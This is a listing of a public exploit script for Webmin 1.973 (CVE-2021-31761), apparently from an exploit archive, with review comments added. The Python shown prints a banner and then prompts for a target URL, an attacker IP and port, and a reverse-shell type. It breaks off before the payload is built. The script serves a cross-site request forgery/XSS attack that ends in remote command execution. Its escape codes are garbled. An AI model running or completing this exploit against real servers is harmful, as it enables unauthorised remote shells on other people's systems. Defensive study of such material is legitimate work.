Authored by Mesh3l_911, Z0ldyck

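Webmin version 1.973 cross-site request forgery exploit that loads a reverse shell. The script's own header describes the vector as a reflected cross-site scripting (XSS) issue leading to command execution through Webmin's running-process feature, so read the CSRF label together with that description when classifying CVE-2021-31761.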

advisories | CVE-2021-31761

# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)
# Date: 24/04/2021
# Exploit Author: Mesh3l_911 & Z0ldyck
# Vendor Homepage: https://www.webmin.com
# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761
# Version: Webmin 1.973
# Tested on: All versions <= 1.973
# CVE: CVE-2021-31761
# Description: Exploits a reflected Cross-Site Scripting (XSS) flaw to
# achieve Remote Command Execution (RCE) through Webmin's running-process
# feature

import time, subprocess,random,urllib.parse


# Cosmetic start-up banner: prints an ASCII-art author tag and nothing else.
# NOTE(review): the " 33[1;37m" / "33[1;m" fragments look like ANSI colour
# escapes ("\033[...m") whose backslash was lost when this listing was
# extracted, and the art itself appears to have lost its backslashes as
# well; as written the fragments are printed literally. Confirm against the
# upstream copy before relying on this text.
print(''' 33[1;37m

__ __ _ ____ _ _________ _ _ _
| / | | | |___ | | |___ / _ | | | | | |
| / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |/| |/ _ / __| '_ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/__ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|___||___/_| |_|____/|_| (_|_) /________/|_|__,_|__, |___|_|_/
__/ |
|___/

33[1;m''')

# Cosmetic credit line with a 0-100 counter; it performs no network or file
# activity and only delays start-up by roughly two seconds (101 * 0.02 s).
# NOTE(review): the leading "r" and the final "nn" look like "\r" and "\n\n"
# with the backslash lost in extraction -- confirm against the upstream copy.
for i in range(101):
    credit_line = "r 33[1;36m [>] POC By 33[1;m 33[1;37mMesh3l 33[1;m 33[1;36m ( 33[1;m 33[1;37m@Mesh3l_911 33[1;m 33[1;36m ) & 33[1;m 33[1;37mZ0ldyck 33[1;m 33[1;36m ( 33[1;m 33[1;37m@electronicbots 33[1;m 33[1;36m ) 33[1;m {} 33[1;m".format(i)
    # end="" keeps every update on the same output line.
    print(credit_line, " 33[1;36m% 33[1;m", end="")
    time.sleep(0.02)
print("nn")

# Interactive operator prompts. All three values are taken verbatim from
# stdin; nothing in this part of the script validates or normalises them.
target = input(
    " 33[1;36m n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > 33[1;m")

# Pin the request path to Webmin's tunnel/link.cgi/ endpoint, adding the
# joining slash only when the supplied base URL does not already end in one.
# NOTE(review): for defenders, access-log entries for this path on hosts
# running the affected versions named in the header are worth reviewing,
# and Webmin's unknown-referrer check (the `referers_none` option) is the
# control to verify is enabled. How the URL is used afterwards is not
# visible in this part of the listing.
endpoint_suffix = 'tunnel/link.cgi/' if target.endswith('/') else '/tunnel/link.cgi/'
target = target + endpoint_suffix

# Callback address and port named in the prompts as the reverse-shell
# listener; both are kept as the raw strings the operator typed.
ip = input(" 33[1;36m n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > 33[1;m")

port = input(" 33[1;36m n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > 33[1;m")

ReverseShell = input
(''' 33[1;37m
n
1- Bash Reverse Shell n
2- PHP Reverse Shell n
3- Python Reverse Shell n
4- Perl Reverse Shell n
5- Ruby Reverse Shell n